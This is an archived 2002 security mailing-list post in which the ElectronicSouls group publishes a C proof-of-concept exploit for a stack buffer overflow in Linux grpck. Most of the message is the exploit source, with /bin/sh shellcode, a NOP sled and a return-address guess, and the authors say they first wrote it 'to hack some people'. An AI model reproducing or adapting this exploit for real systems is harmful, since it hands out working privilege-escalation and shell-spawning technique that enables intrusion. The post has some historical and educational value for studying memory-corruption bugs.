lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200211290706.gAT76VrX054082@mailserver2.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - grpck exploit

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

Originally we wrote this to hack some people, and then we learned about
Unix permissions and realized it wasn't going to get us anywhere.  Now
we offer it up to you so that you can too learn.

# cat ES-grpck-xp.c
/*

  !! PRIVATE - DO NOT DISTRIBUTE !!
  PROPERTY OF THE [ElectronicSouls]

  proof-of-concept-code
 Discovered by BrainStorm (thx 0x90 for the help)

  vulnerable binary: grpck on x86Linux

  Well, nothing special and not even suid on most systems,
  but anyway its fun to work on stuff like this =]


    ( ( E l e c t r o n i c - S o u l s ) )

   p r o o f - o f - c o n c e p t - c o d e

  shoutz: 0x7f - XOR Team - IC - ADM - Raza Mexicana

  */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <strings.h>

#define BUFFER_SIZE   2188
#define ALIGN         0
#define OFFSET        0

char shell[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void)

{
 __asm__("movl %esp, %eax");
}

int main(int argc, char **argv) {

  int bsize  = BUFFER_SIZE;
  int offset = OFFSET;
  int align  = ALIGN;

  unsigned long addr;
  char *cod;
  int i;

  if(argc > 1) offset = atoi(argv[1]);
  if(argc > 2) align = atoi(argv[2]);
  if(argc > 3) bsize = atoi(argv[3]);
  if (bsize % 4 != 0) {

  bsize = bsize + 4 - (bsize % 4); }
  cod  = (char *)malloc(bsize);
  addr  = get_sp() - offset;

  fprintf(stderr, "\n  ( ( E l e c t r o n i c - S o u l s ) ) \n\n");
  fprintf(stderr, " p r o o f - o f - c o n c e p t - c o d e \n");
  fprintf(stderr, " binary: grpck - Using address: 0x%x\n\n", addr);
  fprintf(stderr, "             - BrainStorm - \n");

  for(i = 0; i < bsize; i++) {
  *(long *)&cod[i] = 0x90909090;}
  *(long *)&cod[bsize - 4] = addr;
  memcpy(cod + bsize - strlen(shell) - 8 - align, shell, strlen(shell));
  execl("/usr/sbin/grpck", "grpck", cod, NULL);

return 0;
}


#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Contains Yellow5."
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nEgYMHGVzQGh1c2guY29tAAoJEN5nGqhGcjlt8ckAniG5AKZjKxMw
oxPsrQSRktA7uMN+AJ90as6hNKcWSDiKul1VZdLgneqFyA==
=rwVA
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ